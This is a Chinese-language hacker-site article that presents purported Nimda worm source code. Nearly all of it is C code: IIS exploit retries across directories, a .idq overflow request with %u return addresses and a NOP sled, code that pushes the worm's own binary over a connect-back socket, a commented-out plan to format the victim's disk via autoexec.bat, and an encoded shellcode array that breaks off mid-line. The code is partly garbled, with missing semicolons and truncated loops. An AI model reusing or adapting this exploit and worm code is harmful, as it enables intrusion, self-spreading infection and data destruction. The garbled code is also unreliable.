Nimda源代码级揭秘
file://return 1;
}
}
if(num<23)//循环尝试漏洞编码
{ num++;
closesocket(SockFD);
goto crack;
}
else
{
if(exenum<6)//遍历各个目录
{
num=0;
exenum++;
ExeDirNum=exenum;
closesocket(SockFD);
goto crack;
}
closesocket(SockFD);
}
//printf("扫描全部结束,在此应该进行破坏性操作...\n");
file://可选办法,在目标主机上的autoexec.bat里加上格式化硬盘命令
file://然后执行ExitSystem(1);使主机重新启动
file://重新启动后格式化硬盘
}
return 0;
}
file://在返回的数据中查找指定信息
char* find(const char*pszSource,const char* pszKey)
{
static char szBuffer[2049];
const char * p;
const char * q;
p = q = NULL;
p = strstr(pszSource,pszKey);
if ( p != NULL )
{
p += strlen(pszKey);
q = strstr(p,"\r\n");
if ( q == NULL )
q = p + strlen(p);
strncpy(szBuffer,p,q-p);
return szBuffer;
}
return NULL;
}
char *GetData(int SockFD)
{
file://get data without a blocking recv so we dont hang if we crash the server
char *buffer;
char data[2001];
unsigned long on=1;
unsigned long off=0;
char waste[2001];
int p, i=1;
int t;
memset(data,0,2001);
p=ioctlsocket(SockFD,FIONBIO,&on);
memset(waste,0,2001);
for(t=1;t<10;t++){
i=recv(SockFD, waste, 2000, 0);
if(i>0)
break;
Sleep(500);
}
waste[i]=''''\0'''';
strncat(data,waste,2000);
buffer = ( char * )malloc( 2000 * sizeof( char ) );
strncpy( buffer, data, 2000 );
return buffer;
}
int WINAPI redcode(char *argv[])
{
int i,j,s,pid;
unsigned int cb;
unsigned short port;
char *p,buf[512],buf2[512],buf3[2048];
FILE *fp;
HMODULE g_module=NULL
char svFileName[512]
g_module=GetModuleHandle(NULL)
GetModuleFileName(g_module,svFileName,512)
if((fp=fopen(svFileName,"rb"))==0)
return -2;
if(!(cb=resolve(ADDR)))
return -3;
if((pid=fork())<0)
return -4;
if(pid)
{
fclose(fp);
s = make_connection(argv[1],80);
if(s<0)
{
//printf("connect error:[%d].\n",s);
kill(pid,SIGTERM);
return -5;
}
j = strlen(shellcode);
*(unsigned int *)&shellcode[GMHANDLEA_OFFSET] = GMHANDLEA;
*(unsigned int *)&shellcode[GPADDRESS_OFFSET] = GPADDRESS;
port = htons(PORT);
#if MASKING
port ^= PORTMASK;
cb ^= ADDRMASK;
*(unsigned short *)&shellcode[PORTMASK_OFFSET] = PORTMASK;
*(unsigned int *)&shellcode[ADDRMASK_OFFSET] = ADDRMASK;
#endif
*(unsigned short *)&shellcode[PORT_OFFSET] = port;
*(unsigned int *)&shellcode[ADDR_OFFSET] = cb;
for(i=0;i {
if((shellcode[i]==0x0a)||
(shellcode[i]==0x0d)||
(shellcode[i]==0x3a))
break;
}
if(i!=j)
{
//printf("bad portno or ip address...\n");
close(s);
kill(pid,SIGTERM);
return -6;
}
memset(buf,1,sizeof(buf));
p = &buf[OFFSET-2];
sprintf(p,"%s",forwardjump);
p += strlen(forwardjump);
*p++ = 1;
*p++ = ''''%'''';
*p++ = ''''u'''';
sprintf(p,"%04x",(RET>>0)&0xffff);
p += 4;
*p++ = ''''%'''';
*p++ = ''''u'''';
sprintf(p,"%04x",(RET>>16)&0xffff);
p += 4;
*p++ = 1;
sprintf(p,"%s",jump_to_shell);
memset(buf2,NOP,sizeof(buf2));
memcpy(&buf2[sizeof(buf2)-strlen(shellcode)-strlen(storage)-1],storage,strlen(storage));
memcpy(&buf2[sizeof(buf2)-strlen(shellcode)-1],shellcode,strlen(shellcode));
buf2[sizeof(buf2)-1] = 0;
sprintf(buf3,"GET /a.idq?%s=a HTTP/1.0\r\nShell: %s\r\n\r\n",buf,buf2);
write(s,buf3,strlen(buf3));
//printf("---");
for(i=0;i {
if((i%16)==0)
//printf("\n");
//printf("%02X ",buf3[i]&0xff);
}
//printf("\n---\n");
wait(0);
sleep(1);
shutdown(s,2);
close(s);
//printf("Done.\n");
}
else
{
s = get_connection(PORT);
j = 0;
while((i=fread(buf,1,sizeof(buf),fp)))
{
write(s,buf,i);
j += i;
printf(".");
fflush(stdout);
}
fclose(fp);
//printf("\n%d bytes send...\n",j);
shutdown(s,2);
close(s);
}
return 0;
}
int winapi iis4(char *argv[]) {
WORD wVersionRequested;
WSADATA wsaData;
int err;
SOCKADDR_IN sin,sout;
int soutsize=sizeof(sout);
unsigned long threadid,bytesread;
SOCKET s,in;
wVersionRequested = MAKEWORD(1, 1);
HANDLE hf;
string sfname;
GetModuleFileName(NULL,sfname,MAX_PATH)
hf = CreateFile(sfname,GENERIC_READ,FILE_SHARE_READ,0,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0);
sizemybytes = GetFileSize(hf,NULL);
mybytes = (char *)malloc(sizemybytes);
ReadFile(hf,mybytes,sizemybytes,&bytesread,0);
CloseHandle(hf);
err = WSAStartup(wVersionRequested, &wsaData);
if (err != 0)
return;
setuphostname();
attack(argv[1])
s = socket(AF_INET,SOCK_STREAM,0);
if (s==-1)
return;
sin.sin_family = AF_INET;
sin.sin_addr.s_addr = 0;
sin.sin_port = htons(80);
if (bind(s, (LPSOCKADDR)&sin, sizeof (sin))!=0) return;
if (listen(s,5)!=0) return;
while (1) {
in = accept(s,(sockaddr *)&sout,&soutsize);
CreateThread(0,0,doweb,&in,0,&threadid);
}
int winapi xpmethd(char *argv[])
{
int sockfd[MAX];
char sendXP[]="XP";
char jmpcode[281], execode[840],request[2048];
char *send_buffer;
int num_socks;
int bindport;
int i;
int port;
WSAdata wsd
int eerx=wsastartup(0x0101,&wsd)
if (eerx!=0)
{
WSAcleanup()
return 0
}
unsigned char shellcode[] =
"\x90\xeb\x03\x5d\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc5\x15\x90\x90"
"\x90\x8b\xc5\x33\xc9\x66\xb9\x10\x03\x50\x80\x30\x97\x40\xe2\xfa"
"\x7e\x8e\x95\x97\x97\xcd\x1c\x4d\x14\x7c\x90\xfd\x68\xc4\xf3\x36"
"\x97\x97\x97\x97\xc7\xf3\x1e\xb2\x97\x97\x97\x97\xa4\x4c\x2c\x97"
"\x97\x77\xe0\x7f\x4b\x96\x97\x97\x16\x6c\x97\x97\x68\x28\x98\x14"
"\x59\x96\x97\x97\x16\x54\x97\x97\x96\x97\xf1\x16\xac\xda\xcd\xe2"
"\x70\xa4\x57\x1c\xd4\xab\x94\x54\xf1\x16\xaf\xc7\xd2\xe2\x4e\x14"
"\x57\xef\x1c\xa7\x94\x64\x1c\xd9\x9b\x94\x5c\x16\xae\xdc\xd2\xc5"
"\xd9\xe2\x52\x16\xee\x93\xd2\xdb\xa4\xa5\xe2\x2b\xa4\x68\x1c\xd1"
"\xb7\x94\x54\x1c\x5c\x94\x9f\x16\xae\xd0\xf2\xe3\xc7\xe2\x9e\x16"
"\xee\x93\xe5\xf8\xf4\xd6\xe3\x91\xd0\x14\x57\x93\x7c\x72\x94\x68"
"\x94\x6c\x1c\xc1\xb3\x94\x6d\xa4\x45\xf1\x1c\x80\x1c\x6d\x1c\xd1"
"\x87\xdf\x94\x6f\xa4\x5e\x1c\x58\x94\x5e\x94\x5e\x94\xd9\x8b\x94"
"\x5c\x1c\xae\x94\x6c\x7e\xfe\x96\x97\x97\xc9\x10\x60\x1c\x40\xa4"
"\x57\x60\x47\x1c\x5f\x65\x38\x1e\xa5\x1a\xd5\x9f\xc5\xc7\xc4\x68"
"\x85\xcd\x1e\xd5\x93\x1a\xe5\x82\xc5\xc1\x68\xc5\x93\xcd\xa4\x57"
"\x3b\x13\x57\xe2\x6e\xa4\x5e\x1d\x99\x13\x5e\xe3\x9e\xc5\xc1\xc4"
"\x68\x85\xcd\x3c\x75\x7f\xd1\xc5\xc1\x68\xc5\x93\xcd\x1c\x4f\xa4"
"\x57\x3b\x13\x57\xe2\x6e\xa4\x5e\x1d\x99\x17\x6e\x95\xe3\x9e\xc5"
"\xc1\xc4\x68\x85\xcd\x3c\x75\x70\xa4\x57\xc7\xd7\xc7\xd7\xc7\x68"
"\xc0\x7f\x04\xfd\x87\xc1\xc4\x68\xc0\x7b\xfd\x95\xc4\x68\xc0\x67"
"\xa4\x57\xc0\xc7\x27\x9b\x3c\xcf\x3c\xd7\x3c\xc8\xdf\xc7\xc0\xc1"
"\x3a\xc1\x68\xc0\x57\xdf\xc7\xc0\x3a\xc1\x3a\xc1\x68\xc0\x57\xdf"
"\x27\xd3\x1e\x90\xc0\x68\xc0\x53\xa4\x57\x1c\xd1\x63\x1e\xd0\xab"
"\x1e\xd0\xd7\x1c\x91\x1e\xd0\xaf\xa4\x57\xf1\x2f\x96\x96\x1e\xd0"
"\xbb\xc0\xc0\xa4\x57\xc7\xc7\xc7\xd7\xc7\xdf\xc7\xc7\x3a\xc1\xa4"
"\x57\xc7\x68\xc0\x5f\x68\xe1\x67\x68\xc0\x5b\x68\xe1\x6b\x68\xc0"
"\x5b\xdf\xc7\xc7\xc4\x68\xc0\x63\x1c\x4f\xa4\x57\x23\x93\xc7\x56"
"\x7f\x93\xc7\x68\xc0\x43\x1c\x67\xa4\x57\x1c\x5f\x22\x93\xc7\xc7"
"\xc0\xc6\xc1\x68\xe0\x3f\x68\xc0\x47\x14\xa8\x96\xeb\xb5\xa4\x57"
"\xc7\xc0\x68\xa0\xc1\x68\xe0\x3f\x68\xc0\x4b\x9c\x57\xe3\xb8\x
http://www.hack58.net/Article/60/64/2006/8059.htm